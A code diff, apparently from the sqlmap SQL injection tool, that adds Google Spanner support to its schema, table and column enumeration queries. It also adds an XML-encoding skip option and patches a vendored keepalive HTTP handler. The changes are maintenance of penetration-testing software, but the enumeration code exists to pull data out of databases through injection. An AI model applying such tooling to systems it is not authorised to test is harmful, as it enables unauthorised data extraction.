elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE, DBMS.SPANNER):
|
||||
warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "for enumeration as the counterpart to database "
|
||||
warnMsg += "names on other DBMSes"
|
||||
|
|
@ -311,6 +311,9 @@ class Databases(object):
|
|||
if len(dbs) < 2 and ("%s," % condition) in query:
|
||||
query = query.replace("%s," % condition, "", 1)
|
||||
|
||||
if Backend.isDbms(DBMS.SPANNER):
|
||||
query = query.replace("IN ('default')", "IN ('')")
|
||||
|
||||
if query:
|
||||
values = inject.getValue(query, blind=False, time=False)
|
||||
|
||||
|
|
@ -371,7 +374,9 @@ class Databases(object):
|
|||
infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.SPANNER,):
|
||||
query = _count % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(db))
|
||||
elif Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB):
|
||||
query = _count % unsafeSQLIdentificatorNaming(db)
|
||||
else:
|
||||
query = _count
|
||||
|
|
@ -404,6 +409,8 @@ class Databases(object):
|
|||
query = _query % index
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX, DBMS.FRONTBASE, DBMS.VIRTUOSO):
|
||||
query = _query % (index, unsafeSQLIdentificatorNaming(db))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SPANNER,):
|
||||
query = _query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(db), index)
|
||||
else:
|
||||
query = _query % (unsafeSQLIdentificatorNaming(db), index)
|
||||
|
||||
|
|
@ -628,6 +635,10 @@ class Databases(object):
|
|||
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
|
||||
query = re.sub("column_type", "data_type", query, flags=re.I)
|
||||
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(conf.db))
|
||||
query += condQuery
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE):
|
||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||
query += condQuery
|
||||
|
|
@ -773,6 +784,10 @@ class Databases(object):
|
|||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl)
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), conf.db, conf.db)
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
||||
query += condQuery
|
||||
|
|
@ -841,6 +856,9 @@ class Databases(object):
|
|||
elif Backend.isDbms(DBMS.SNOWFLAKE):
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||
field = None
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(conf.db))
|
||||
field = None
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE):
|
||||
query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index))
|
||||
field = None
|
||||
|
|
@ -895,6 +913,8 @@ class Databases(object):
|
|||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column)
|
||||
elif Backend.isDbms(DBMS.MONETDB):
|
||||
query = rootQuery.blind.query2 % (column, unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(conf.db))
|
||||
|
||||
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
key = int(colType) if hasattr(colType, "isdigit") and colType.isdigit() else colType
|
||||
|
|
|
|||
|
|
@ -241,7 +241,7 @@ class Entries(object):
|
|||
entries = BigArray(_zip(*[entries[colName] for colName in colList]))
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE, DBMS.SPANNER):
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
|
|
@ -410,7 +410,7 @@ class Entries(object):
|
|||
if column not in entries:
|
||||
entries[column] = BigArray()
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE, DBMS.SPANNER):
|
||||
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
|
||||
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
|
||||
|
|
|
|||
|
|
@ -153,7 +153,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
|
|||
if os.path.exists(filename):
|
||||
try:
|
||||
with openFile(filename, "wb") as f:
|
||||
f.write("1")
|
||||
f.write(b"1")
|
||||
except IOError as ex:
|
||||
errMsg = "there has been a file opening/writing error "
|
||||
errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex))
|
||||
|
|
|
|||
|
|
@ -198,6 +198,10 @@ safeFreq = 0
|
|||
# Valid: True or False
|
||||
skipUrlEncode = False
|
||||
|
||||
# Skip safe (HTML) encoding of payload data for SOAP/XML.
|
||||
# Valid: True or False
|
||||
skipXmlEncode = False
|
||||
|
||||
# Parameter used to hold anti-CSRF token.
|
||||
csrfToken =
|
||||
|
||||
|
|
|
|||
30
thirdparty/keepalive/keepalive.py
vendored
30
thirdparty/keepalive/keepalive.py
vendored
|
|
@ -164,8 +164,10 @@ class ConnectionManager:
|
|||
|
||||
def set_ready(self, connection, ready):
|
||||
self._lock.acquire()
|
||||
if connection in self._readymap: self._readymap[connection] = ready
|
||||
self._lock.release()
|
||||
try:
|
||||
if connection in self._readymap: self._readymap[connection] = ready
|
||||
finally:
|
||||
self._lock.release()
|
||||
|
||||
def get_ready_conn(self, host):
|
||||
conn = None
|
||||
|
|
@ -258,6 +260,16 @@ class KeepAliveHandler:
|
|||
|
||||
if DEBUG: DEBUG.info("STATUS: %s, %s", r.status, r.reason)
|
||||
|
||||
if not r.will_close:
|
||||
try:
|
||||
headers = getattr(r, 'msg', None)
|
||||
if headers:
|
||||
c_head = headers.get("connection")
|
||||
if c_head and "close" in c_head.lower():
|
||||
r.will_close = True
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# if not a persistent connection, don't try to reuse it
|
||||
if r.will_close:
|
||||
if DEBUG: DEBUG.info('server will close connection, discarding')
|
||||
|
|
@ -322,16 +334,16 @@ class KeepAliveHandler:
|
|||
|
||||
def _start_transaction(self, h, req):
|
||||
try:
|
||||
if req.data is not None:
|
||||
if req.data:
|
||||
data = req.data
|
||||
if hasattr(req, 'selector'):
|
||||
h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
else:
|
||||
h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
if not req.has_header('Content-type'):
|
||||
if 'Content-type' not in req.headers:
|
||||
h.putheader('Content-type',
|
||||
'application/x-www-form-urlencoded')
|
||||
if not req.has_header('Content-length'):
|
||||
if 'Content-length' not in req.headers:
|
||||
h.putheader('Content-length', '%d' % len(data))
|
||||
else:
|
||||
if hasattr(req, 'selector'):
|
||||
|
|
@ -341,17 +353,17 @@ class KeepAliveHandler:
|
|||
except (socket.error, _http_client.HTTPException) as err:
|
||||
raise _urllib.error.URLError(err)
|
||||
|
||||
if not req.has_header('Connection'):
|
||||
if 'Connection' not in req.headers:
|
||||
h.putheader('Connection', 'keep-alive')
|
||||
|
||||
for args in self.parent.addheaders:
|
||||
if not req.has_header(args[0]):
|
||||
if args[0] not in req.headers:
|
||||
h.putheader(*args)
|
||||
for k, v in req.headers.items():
|
||||
h.putheader(k, v)
|
||||
h.endheaders()
|
||||
if req.data is not None:
|
||||
h.send(data)
|
||||
if req.data:
|
||||
h.send(req.data)
|
||||
|
||||
def _get_connection(self, host):
|
||||
raise NotImplementedError()
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue